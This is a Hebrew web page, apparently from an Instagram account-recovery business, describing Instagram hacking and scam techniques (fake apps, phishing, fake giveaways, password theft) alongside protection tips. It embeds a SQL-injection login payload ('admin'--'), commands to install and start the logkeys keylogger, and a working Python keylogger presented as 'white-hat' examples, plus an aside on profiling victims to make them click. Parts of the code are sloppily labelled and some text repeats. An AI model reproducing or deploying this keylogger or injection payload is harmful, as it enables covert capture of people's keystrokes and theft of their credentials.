• 053-9263856
  • mikel0174@gmail.com
Facebook-f Twitter Instagram Youtube Linkedin Whatsapp
מחירים
המלצות
יצירת קשר
חיפוש

אתר זה מקודם בגוגל בלי קישורים

המלצות

בעיות טכניות באינסטגרם מחיקה ושחזור חשבון

אינסטגרם הפכה לאחת מפלטפורמות המדיה החברתית הפופולריות ביותר בשנים האחרונות, עם למעלה ממיליארד משתמשים פעילים בחודש.

למרות שזו פלטפורמה נהדרת לשיתוף תמונות ולהתחבר עם חברים, היא גם הפכה למטרה מרכזית עבור האקרים ורמאים. 

מאמר זה יעסוק בטכניקות נפוצות של פריצה והונאה באינסטגרם

דוגמאות וטיפים כיצד להגן על החשבון.

לפרוץ לאינסטגרם
לפרוץ לאינסטגרם

אפליקציות מזויפות

אפליקציות מזויפות הן הונאת אינסטגרם נפוצה נוספת, שבה התוקפים יוצרים אפליקציות שנראות כמו אפליקציית אינסטגרם הרשמית. 

לאחר הורדת האפליקציה המזויפת, היא עלולה לגנוב את פרטי הכניסה או מידע רגיש אחר.

כדי להימנע מהורדת אפליקציות מזויפות, הורידו רק אפליקציות מחנות האפליקציות הרשמית, וחפשו אפליקציות עם דירוג גבוה וביקורות חיוביות. 

בנוסף, בדוק את ההרשאות של האפליקציה לפני התקנתה, והימנע מאפליקציות שמבקשות הרשאות מיותרות, כגון גישה לאנשי הקשר או המיקום.

פריצות והונאות באינסטגרם הופכות נפוצות יותר ויותר, אך ישנם צעדים שתוכל לנקוט כדי להגן על החשבון.

היזהר תמיד מקישורים חשודים, מתנות מזויפות ואפליקציות מזויפות

השתמש בסיסמאות חזקות וב-2FA כדי לאבטח את חשבונך. 

אפליקציה מזויפת שמתחזה לכניסה לגיטימית לחשבון סושיאל.

המשתמשים מאמינים שהאפליקציה מבקשת מהם פרטים בגלל ניתוק בחשבון ואז מקלידים את פרטי החשבון שנשלחים לתוקף.

				
					import requests

# Set up the URL and payload
url = "https://example.com/login"
payload = {"username": "admin'--", "password": "password"}

# Send the login request
r = requests.post(url, data=payload)

# Check the response
if r.status_code == 200:
    print("Login successful!")
else:
    print("Login failed.")

הונאות דיוג \ פישינג

פישינג היא טכניקת פריצה נפוצה המשמשת לגניבת אישורי כניסה ומידע רגיש אחר. הונאות דיוג באינסטגרם יכולות להתבצע באמצעות מיילים, הודעות טקסט או הודעות ישירות. 

התוקף עשוי להתחזות לאינסטגרם או כמקור מהימן, ולבקש ללחוץ על קישור כדי לאמת את חשבונך, לשנות את הסיסמה או להטעות באיזשהו הצעת פרס או זכייה.

אחת הדוגמאות להונאת דיוג באינסטגרם הינה הודעה שפנתה למשתמשים בישראל כללה תוקפים ששלחו הודעות למשתמשים הטוענים שהם מצוות תמיכת הלקוחות של אינסטגרם. 

בהודעה צוין כי החשבון של המשתמש מפר את מדיניות אינסטגרם והוא יושעה אם הוא לא יאמת את חשבונו על ידי לחיצה על קישור שסופק בהודעה. 

הקישור לקח את המשתמשים לדף התחברות מזויף שנראה כמו העמוד הרשמי של אינסטגרם, אך למעשה היה אתר פישינג שנועד לגנוב אישורי כניסה.

דוגמה נוספת להונאת פישינג באינסטגרם בישראל כללה תוקפים ששלחו מיילים למשתמשים הטוענים שהם מבנק ישראלי ידוע. 

המייל כלל קישור שהוביל לדף התחברות מזויף שנועד לגנוב את אישורי הכניסה לבנק של המשתמש. 

המייל תוכנן כך שייראה כמו מייל לגיטימי מהבנק, ואף כלל את הלוגו והמיתוג של הבנק.

כדי להגן על עצמך מפני הונאות דיוג, בדוק תמיד את כתובת האימייל או את שם המשתמש של השולח, והימנע מלחיצה על קישורים חשודים. 

בנוסף, הפעל אימות דו-גורמי (2FA) בחשבון האינסטגרם, מה שדורש קוד שנשלח לטלפון כדי להיכנס. 

כדאי לנסות למנוע גישה לא מורשית גם אם פרטי הכניסה נפגעים.

הרשת של ההאקרים
הרשת של ההאקרים

בכפתור פה למטה ניתן לשמוע מה גולשים רוצים בשביל לגרום להם ללחוץ על קישור כלשהו.

מה גורם למשתמשים להשאיר פרטים באתר?

מתנות מזויפות

מתנות מזויפות הן תרמית נפוצה נוספת באינסטגרם, שבה התוקפים מתחזים למותג פופולרי או כמשפיע, ומציעים פרס בתמורה לעקוב אחר החשבון, שיתוף הפוסט או תיוג חברים. 

עם זאת, לאחר השלמת השלבים, התוקף ייעלם מבלי להעניק את הפרס.

כדי להימנע מליפול למתנות מזויפות, כדאי להיזהר מחשבונות המבטיחים פרסים גדולים ללא כל תהליך אימות. 

חפש תג חשבון מאומת, וקרא את הפוסטים הקודמים של החשבון כדי לראות אם יש להם היסטוריה של מתנות לגיטימיות. 

אם אינך בטוח, תוכל גם לחפש את האתר הרשמי של המותג או המשפיען או חשבונות מדיה חברתית כדי לאמת את המתנה.

 

מתנות או מתנות מזויפות הן סוג נפוץ של פישינג והונאה באינסטגרם, שבו התוקפים מתחזים למותג ידוע, משפיע או ידוען, ומציעים פרס בתמורה לעקוב אחר החשבון שלהם, שיתוף הפוסט שלהם או תיוג חברים. 

לאחר שהמשתמש סיים את השלבים, התוקף נעלם מבלי להעניק את הפרס, או גרוע מכך, גונב את המידע האישי או אישורי הכניסה של המשתמש.

 

מתנות או מתנות מזויפות אלו נועדו לפתות משתמשים למסור את המידע האישי או אישורי הכניסה שלהם, או להשיג מספר רב של עוקבים או מעורבות בחשבון המזויף שלהם.

התקפות אלו יכולות להתבצע על ידי יצירת חשבונות מזויפים המחקים את המראה והתחושה של החשבון המקורי, או על ידי חטיפת חשבונות לגיטימיים באמצעות התקפות פישינג.

 

כדי להימנע מליפול קורבן למתנות או מתנות מזויפות באינסטגרם, על המשתמשים להיזהר מחשבונות המבטיחים פרסים גדולים ללא כל תהליך אימות. 

אחת הטכניקות היא לחפש חשבון מאומת ולקרוא את הפוסטים הקודמים של החשבון כדי לראות אם יש להם היסטוריה של מתנות לגיטימיות. 

(פשוט לאסוף מידע על הקורבן ולגלות חולשות שיגרמו לרצון ללחוץ גם בלי הגיון)

אם המשתמשים לא בטוחים, הם יכולים גם לחפש את האתר הרשמי של המותג או המשפיע או חשבונות מדיה חברתית כדי לאמת את המתנה.

 

כמו כן, חשוב למשתמשים להימנע מלחיצה על קישורים חשודים או מסירת מידע אישי, כגון אישורי כניסה, לכל מי שהם אינם בוטחים בהם. 

משתמשים צריכים גם להפעיל אימות דו-גורמי (2FA) בחשבון האינסטגרם, מה שמצריך קוד שנשלח לטלפון כדי להיכנס. 

 

				
					# רכיב החומרה
sudo apt-get install logkeys

# css
sudo logkeys --start

# bash 
sudo logkeys --kill

# python
import subprocess

log_file = "/var/log/logkeys.log"

# התחלת עבודה keylogger
subprocess.call(["sudo", "logkeys", "--start"])

# Read the log file and print out the keystrokes
with open(log_file) as f:
    while True:
        line = f.readline()
        if not line:
            time.sleep(0.1)
            continue
        print(line.strip())

גניבת סיסמא

גניבת סיסמאות היא טכניקת פריצה נפוצה המשמשת כדי לקבל גישה לחשבון אינסטגרם.

תוקפים עשויים להשתמש ב-keylogger, תוכנית שמתעדת כל הקשה שאתה מבצע, כדי לגנוב את פרטי הכניסה. 

נהוג להשתמש במתקפת brute force, שבה פשוט מנסים שילובים שונים של שמות משתמש וסיסמאות עד שהם מוצאים את המתאימה.

כדי להגן על הסיסמה, השתמש בסיסמה חזקה וייחודית הכוללת שילוב של אותיות, מספרים וסמלים. 

הימנע משימוש במילים או ביטויים נפוצים, ולעולם אל תשתף את הסיסמה עם אף אחד ולאף אחד. 

אתה יכול גם להשתמש במנהל סיסמאות כדי ליצור ולאחסן סיסמאות מורכבות.

דוגמאות לקודים של האקר כובע לבן (עם נגיעות כחולות)

				
					# ייבוא הספריות הנחוצות
import logging
import threading
import time
import keyboard

# Set  logging module
log_file = "key_log.txt"
logging.basicConfig(filename=log_file, level=logging.DEBUG, format='%(asctime)s: %(message)s')

# הגדרת תפקוד לחיצות פעילות
def key_handler(event):
    logging.info('Key %s was pressed.' % event.name)

#  thread for the keylogger
def keylogger():
    keyboard.on_release(callback=key_handler)

# Start the keylogger thread
thread = threading.Thread(target=keylogger)
thread.start()

# המתנה ללחיצה ולתחילת העבודה של הגנב
time.sleep(1)

# Main program לולאה ראשית
while True:
    try:
        # Do something here
        print("יאללה נא ללחוץ בבקשה!")
        time.sleep(10)
    except KeyboardInterrupt:
        # Clean up and exit the program
        print("מסיים...")
        keyboard.unhook_all()
        break